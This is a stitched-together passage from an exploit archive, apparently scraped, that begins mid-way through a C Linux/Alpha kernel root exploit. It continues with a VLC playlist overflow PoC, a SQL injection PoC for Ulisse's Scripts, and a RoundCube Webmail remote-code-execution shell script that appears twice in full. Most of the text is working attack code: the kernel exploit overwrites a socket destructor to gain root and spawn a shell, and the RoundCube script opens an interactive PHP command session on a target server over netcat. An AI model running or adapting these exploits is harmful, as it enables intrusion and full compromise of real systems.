 * get_cookie() returns (unsigned)-1, which is rebased as if it were valid.
 * `path[]` is unused. */
unsigned long get_sock_addr(unsigned int port)
{
    FILE *f;
    char buf[1024], path[512];
    unsigned int testport, cookie, a;
    unsigned long addr, b;
    f = fopen("/proc/net/tcp", "r");
    if (f < 0) {
        printf("[*] Failed to open /proc/net/tcp\n");
        return 0;
    }
    while (fgets(buf, 1024, f)) {
        sscanf(buf, "%4d: %08X:%04X %08X:%04X %02X %08X:%08X "
               "%02X:%08lX %08X %5d %8d %lu %d %p %lu %lu %u %u "
               "%d\n",
               &a, &a, &testport, &a, &a, &a, &a, &a, &a, &b,
               &a, &a, &a, &b, &a, (void **)&addr, &b, &b, &a, &a,
               &a);
        if (testport == port) {
            /* If kptr_restrict is on... */
            if (!addr) {
                cookie = get_cookie(port);
                addr = (unsigned long)cookie + KERNEL_BASE;
            }
            fclose(f);
            return addr;
        }
    }
    fclose(f);
    return 0;
}
/* Kernel-mode payload (reached via trampoline()).  Locates thread_info by
 * masking the address of a stack local down to the 16 KiB stack base,
 * reads the task_struct pointer at TASK_STRUCT_OFFSET, then scans 1000 ints
 * of the task structure for the run uid x4, gid x4 and rewrites it to root
 * with all capability words set.  Layout-specific: the header limits it to
 * kernels without a separate cred struct; there is no bound check on the
 * scan. */
void getroot()
{
    int i;
    /* Alpha has 16K stacks */
    unsigned long thread_info = (unsigned long)&i & ~0x3fff;
    unsigned long task_struct = *(unsigned long *)(thread_info +
                                                   TASK_STRUCT_OFFSET);
    int *j = (int *)task_struct;
    for (i = 0; i < 1000; i++, j++) {
        if (j[0] == uid && j[1] == uid && j[2] == uid && j[3] == uid &&
            j[4] == gid && j[5] == gid && j[6] == gid && j[7] == gid) {
            /* uid, euid, suid, fsuid */
            j[0] = j[1] = j[2] = j[3] = 0;
            /* gid, egid, sgid, fsgid */
            j[4] = j[5] = j[6] = j[7] = 0;
            /* caps */
            j[10] = j[11] = 0xffffffff;
            j[12] = j[13] = 0xffffffff;
            j[14] = j[15] = 0xffffffff;
            break;
        }
    }
}
/* Position-independent Alpha stub copied to the landing page by main().
 * Loads the constant PAYLOAD into $0, fetches the quadword stored there
 * (main() writes &getroot to it) into the procedure-value register $27 and
 * calls through it with the return address in $26.  Only the first 256 bytes
 * of this function are copied, so it must stay small. */
void trampoline()
{
    asm volatile( "mov %0, $0\n"
                  "ldq $27, 0($0)\n"
                  "jsr $26, ($27)\n"
                  : : "r"(PAYLOAD));
}
/* Entry point: bind and listen a TCP socket on PORT so it shows up in
 * /proc/net/tcp, recover its sock address, map a landing page at 0x10000
 * and a payload page at PAYLOAD, then use kernel_write() three times to
 * patch the sk_destruct pointer (target + SOCK_OFFSET) one byte at a time
 * before close(sock) triggers the destructor.  Execs a shell if the uid is
 * now 0.
 *
 * argc/argv and `len` are unused.  `sock` is leaked on the bind/listen error
 * paths.  memcpy() copies 256 bytes starting at trampoline, which reads past
 * the end of that function.  execl() failure falls off the end of main
 * (implicit return 0 in C99). */
int main(int argc, char * argv[])
{
    unsigned long target, *payload;
    void *landing;
    int sock;
    struct sockaddr_in addr;
    size_t len;
    uid = getuid();
    gid = getgid();
    printf("[*] Opening TCP socket...\n");
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        printf("[*] Failed to open TCP socket.\n");
        return -1;
    }
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = INADDR_ANY;
    if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
        printf("[*] Failed to bind TCP socket.\n");
        return -1;
    }
    /* Our socket won't appear in /proc/net/tcp unless it's listening */
    if (listen(sock, 1)) {
        printf("[*] Failed to listen on TCP socket.\n");
        return -1;
    }
    printf("[*] Getting socket address from INET_DIAG...\n");
    target = get_sock_addr(PORT);
    if (!target) {
        printf("[*] Failed to get socket address.\n");
        return -1;
    }
    printf("[*] Socket address: %lx\n", target);
    target += SOCK_OFFSET;
    printf("[*] Mapping payload...\n");
    /* landing page at 0x10000 (MAP_FIXED, RWX): receives the trampoline code;
     * the fd argument is 0 rather than -1, which MAP_ANONYMOUS ignores */
    landing = mmap((void *)0x10000, PAGE_SIZE, PROT_READ | PROT_WRITE |
                   PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
                   0, 0);
    /* We need to keep the address of our payload at a constant address,
     * so we can retrieve it and jump to it in our trampoline. */
    payload = (unsigned long *)mmap((void *)PAYLOAD, PAGE_SIZE,
                                    PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE |
                                    MAP_ANONYMOUS | MAP_FIXED, 0, 0);
    if (landing == MAP_FAILED || payload == MAP_FAILED) {
        printf("[*] Failed to map payload.\n");
        return -1;
    }
    *payload = (unsigned long)&getroot;
    memcpy((void *)landing, &trampoline, 256);
    printf("[*] Overwriting function pointer at %lx...\n", target);
    /* each call stores one byte (see kernel_write); the resulting pointer is
     * 0x10000, the landing page above */
    kernel_write(target, 0);
    kernel_write(target + 4, 0);
    kernel_write(target + 1, 1);
    printf("[*] Triggering payload...\n");
    close(sock);
    if (getuid()) {
        printf("[*] Failed to get root.\n");
        return -1;
    }
    printf("[*] Got root!\n");
    execl("/bin/sh", "sh", NULL);
}
Dr_IDE/VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux) ( multiple)
#!/usr/bin/env python
###########################################################################
#
# VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)
# Found By: Dr_IDE
# Tested On: OSX 10.6.2 (v1.0.3)
# Tested On: Ubuntu 9 [2.6.28-15-generic] (v0.9.9a)
# Tested On: No Go on Windows
#
###########################################################################
# Generates an XSPF playlist whose single <location> holds an oversized
# rtsp:// URL.  Python 2 syntax: the `print "Error"` statement below is a
# syntax error under Python 3.
header1 = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>rtsp://localhost@localhost/foo/#{")
# 2 + 4 + 10000 filler bytes placed in the URL fragment; a crash PoC only,
# nothing here controls where execution goes.
payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)
header2 = ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");
try:
    f1 = open("vlc_1.0.X.xspf","w")
    f1.write(header1 + payload + header2)
    f1.close()
    print("\nExploit file created!\n")
except:
    # bare except: swallows every exception (including KeyboardInterrupt)
    # and hides the actual cause of the failure
    print "Error"
Sora/Ulisse's Scripts 2.6.1 ladder.php SQL Injection Vulnerability ( php)
# Tested on: Windows Vista Home Premium and Linux 2.6.28.1 (Backtrack 3) ------------------------------ > Ulisse's Scripts 2.6.1 ladder.php SQL Injection Vulnerability > Author: Sora > Contact: vhr95zw [at] hotmail [dot] com > Website: http://greyhathackers.wordpress.com/ > Google Dork: "In your dreams, script kiddies." # VULNERABILITY DESCRIPTION: Type: SQL Injection Level: 4/5 (CRITICAL) Sora has advised that Ulisse's ladder.php file from Ulisse's Scripts 2.6.1 suffers a remote SQL injection vulnerability in the parameter 'gid'. The database inputs are not properly sanitized. # VULNERABILITY SOLUTION: Sanitize the unsanitized database inputs in the file ladder.php. # Proof of Concept: http://server/ulisse/ladder.php?gid=1'
Sora/Ulisse's Scripts 2.6.1 SQL Injection ( na)
# Exploit Title: Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability # Date: January 6th, 2010 # Author: Sora # Version: 2.6.1 # Tested on: Windows Vista Home Premium and Linux 2.6.28.1 (Backtrack 3) —————————— > Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability > Author: Sora > Contact: vhr95zw [at] hotmail [dot] com > Website: http://greyhathackers.wordpress.com/ > Google Dork: “In your dreams, script kiddies.” # VULNERABILITY DESCRIPTION: Type: SQL Injection Level: 4/5 (CRITICAL) Sora has advised that Ulisse’s ladder.php file from Ulisse’s Scripts 2.6.1 suffers a remote SQL injection vulnerability in the parameter ‘gid’. The database inputs are not properly sanitized. # VULNERABILITY SOLUTION: Sanitize the unsanitized database inputs in the file ladder.php. # Proof of Concept: http://www.site.com/ulisse/ladder.php?gid=1′
Ulisse's Scripts version 2.6.1 suffers from a remote SQL injection vulnerability in ladder.php.
Hunger/RoundCube Webmail <= 0.2b Remote Code Execution Exploit ( php)
#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#
# Structure: build one raw HTTP POST per command with netcat, where the POST
# body is the preg_replace()/eval trigger and the base64-encoded PHP goes in
# the Accept header ($_SERVER[HTTP_ACCEPT]); the reply body is printed and
# the loop reads the next command until "exit".
# Portability note: the shebang is /bin/sh but `echo -e`/`echo -ne` and `let`
# are bash/ksh features; under dash `echo -e` prints the "-e" literally.
echo 'Exploit for Roundcube Webmail =< 0.2-beta'
echo 'html2text.php / preg_replace() / eval bug'
echo -e '\r\nby Hunger <rch2tex@hunger.hu>\r\n\n'
if [ "$2" = "" ]; then echo "
Usage:
$0 <hostname> <deeplink>
Example:
\$ $0 localhost /roundcube/bin/html2text.php
For https sites use stunnel or socat!
"; exit 1; fi
NETCATEXE=`which nc`
BASE64ENC=`which base64`
if [ "$NETCATEXE" = "" ] || [ "$BASE64ENC" = "" ];
then
echo "Required tool(s) missing... (netcat, base64)"
exit 2
fi
USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
MYPAYLOAD="{\${EVAL(BASE64_DECODE(\$_SERVER[HTTP_ACCEPT]))}}"
EVALEDTAG="<b>"
EVALEDTAG=$EVALEDTAG$MYPAYLOAD
EVALEDTAG=$EVALEDTAG"</b>"
# 54 == length of $EVALEDTAG ("<b>" + 47-byte payload + "</b>"); must be
# updated by hand if MYPAYLOAD changes
PARAMSIZE=54
HOST_NAME=$1
DEEP_LINK=$2
HTTP_PORT=80
HTTPHEADR=""
HTTPHEADR=$HTTPHEADR"POST $DEEP_LINK HTTP/1.0\r\n"
HTTPHEADR=$HTTPHEADR"Host: $HOST_NAME\r\n"
HTTPHEADR=$HTTPHEADR"User-Agent: $USERAGENT\r\n"
HTTPHEADR=$HTTPHEADR"Content-length: $PARAMSIZE\r\n"
HTTPHEADR=$HTTPHEADR"Accept:"
SPLOITCHK='Succeeded! :))'
PHPAYLOAD='echo("'
PHPAYLOAD=$PHPAYLOAD$SPLOITCHK'\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Type PHP functions as shell commands. ;)\r\n'
PHPAYLOAD=$PHPAYLOAD'Use \"exit\" to close session.\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Good luck and have phun! ;D\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'")'
HTTPOKMSG="HTTP/1.0 200 OK"
HTTP1KMSG="HTTP/1.1 200 OK"
RETURNCHR=`echo -e "\r\n"`
echo -n "Trying to exploit... "
# f counts successful responses (0 on the first, self-checking request);
# the loop ends when the user types "exit"
f=0; until [ "$PHPAYLOAD" = "exit" ]; do
PHPAYLOAD=`echo "$PHPAYLOAD;" |$BASE64ENC --wrap=0`
HTTP_SEND="$HTTPHEADR $PHPAYLOAD\r\n\r\n$EVALEDTAG"
HTTP_BACK=`echo -ne "$HTTP_SEND"|$NETCATEXE $HOST_NAME $HTTP_PORT`
if [ $? != 0 ]; then echo "Connection failed."; exit 3; fi
# The `while read` runs in a pipeline subshell, so `let l++`/`let e++` and
# every `exit 4` below affect only that subshell; the parent detects the
# failure through the pipeline status checked after `done`.
# l = line number, e = number of blank (header-terminating) lines seen.
e=0; l=0; echo "$HTTP_BACK" | while read i; do let l++;
if [ $l = 1 ] && [ "$i" != "$HTTPOKMSG$RETURNCHR" ] \
&& [ "$i" != "$HTTP1KMSG$RETURNCHR" ]; then
echo "Bad Server Response :\\"; exit 4; fi;
if [ $e = 1 ] && [ $f = 0 ] && [ "$i" = "$MYPAYLOAD" ]; then
echo "Target has been patched /o\\"; exit 4; fi
if [ $e = 1 ] && [ $f = 0 ] && [ "$i" != "$SPLOITCHK$RETURNCHR" ]; then
echo -e "Exploitation failed :(("; exit 4; elif
[ "$i" = "$SPLOITCHK$RETURNCHR" ]; then let f++; fi
if [ $e -gt 0 ]; then echo "$i"; fi
if [ "$i" = "$RETURNCHR" ]; then let e++; fi
done
# $? here is the subshell's exit status (4 on any of the failures above)
if [ $? != 4 ]; then let f++; echo -ne "PHP> "; else
echo -e "\n\nDump:\n\n$HTTP_BACK"; exit 4; fi;
read PHPAYLOAD
done
# milw0rm.com [2008-12-22]
Hunger/RoundCube Webmail 0.2b Remote Code Execution ( na)
#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#
# Structure: build one raw HTTP POST per command with netcat, where the POST
# body is the preg_replace()/eval trigger and the base64-encoded PHP goes in
# the Accept header ($_SERVER[HTTP_ACCEPT]); the reply body is printed and
# the loop reads the next command until "exit".
# Portability note: the shebang is /bin/sh but `echo -e`/`echo -ne` and `let`
# are bash/ksh features; under dash `echo -e` prints the "-e" literally.
echo 'Exploit for Roundcube Webmail =< 0.2-beta'
echo 'html2text.php / preg_replace() / eval bug'
echo -e '\r\nby Hunger <rch2tex@hunger.hu>\r\n\n'
if [ "$2" = "" ]; then echo "
Usage:
$0 <hostname> <deeplink>
Example:
\$ $0 localhost /roundcube/bin/html2text.php
For https sites use stunnel or socat!
"; exit 1; fi
NETCATEXE=`which nc`
BASE64ENC=`which base64`
if [ "$NETCATEXE" = "" ] || [ "$BASE64ENC" = "" ];
then
echo "Required tool(s) missing... (netcat, base64)"
exit 2
fi
USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
MYPAYLOAD="{\${EVAL(BASE64_DECODE(\$_SERVER[HTTP_ACCEPT]))}}"
EVALEDTAG="<b>"
EVALEDTAG=$EVALEDTAG$MYPAYLOAD
EVALEDTAG=$EVALEDTAG"</b>"
# 54 == length of $EVALEDTAG ("<b>" + 47-byte payload + "</b>"); must be
# updated by hand if MYPAYLOAD changes
PARAMSIZE=54
HOST_NAME=$1
DEEP_LINK=$2
HTTP_PORT=80
HTTPHEADR=""
HTTPHEADR=$HTTPHEADR"POST $DEEP_LINK HTTP/1.0\r\n"
HTTPHEADR=$HTTPHEADR"Host: $HOST_NAME\r\n"
HTTPHEADR=$HTTPHEADR"User-Agent: $USERAGENT\r\n"
HTTPHEADR=$HTTPHEADR"Content-length: $PARAMSIZE\r\n"
HTTPHEADR=$HTTPHEADR"Accept:"
SPLOITCHK='Succeeded! :))'
PHPAYLOAD='echo("'
PHPAYLOAD=$PHPAYLOAD$SPLOITCHK'\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Type PHP functions as shell commands. ;)\r\n'
PHPAYLOAD=$PHPAYLOAD'Use \"exit\" to close session.\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Good luck and have phun! ;D\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'")'
HTTPOKMSG="HTTP/1.0 200 OK"
HTTP1KMSG="HTTP/1.1 200 OK"
RETURNCHR=`echo -e "\r\n"`
echo -n "Trying to exploit... "
# f counts successful responses (0 on the first, self-checking request);
# the loop ends when the user types "exit"
f=0; until [ "$PHPAYLOAD" = "exit" ]; do
PHPAYLOAD=`echo "$PHPAYLOAD;" |$BASE64ENC --wrap=0`
HTTP_SEND="$HTTPHEADR $PHPAYLOAD\r\n\r\n$EVALEDTAG"
HTTP_BACK=`echo -ne "$HTTP_SEND"|$NETCATEXE $HOST_NAME $HTTP_PORT`
if [ $? != 0 ]; then echo "Connection failed."; exit 3; fi
# The `while read` runs in a pipeline subshell, so `let l++`/`let e++` and
# every `exit 4` below affect only that subshell; the parent detects the
# failure through the pipeline status checked after `done`.
# l = line number, e = number of blank (header-terminating) lines seen.
e=0; l=0; echo "$HTTP_BACK" | while read i; do let l++;
if [ $l = 1 ] && [ "$i" != "$HTTPOKMSG$RETURNCHR" ] \
&& [ "$i" != "$HTTP1KMSG$RETURNCHR" ]; then
echo "Bad Server Response :\\"; exit 4; fi;
if [ $e = 1 ] && [ $f = 0 ] && [ "$i" = "$MYPAYLOAD" ]; then
echo "Target has been patched /o\\"; exit 4; fi
if [ $e = 1 ] && [ $f = 0 ] && [ "$i" != "$SPLOITCHK$RETURNCHR" ]; then
echo -e "Exploitation failed :(("; exit 4; elif
[ "$i" = "$SPLOITCHK$RETURNCHR" ]; then let f++; fi
if [ $e -gt 0 ]; then echo "$i"; fi
if [ "$i" = "$RETURNCHR" ]; then let e++; fi
done
# $? here is the subshell's exit status (4 on any of the failures above)
if [ $? != 4 ]; then let f++; echo -ne "PHP> "; else
echo -e "\n\nDump:\n\n$HTTP_BACK"; exit 4; fi;
read PHPAYLOAD
done
RoundCube Webmail versions 0.2b and below remote code execution exploit.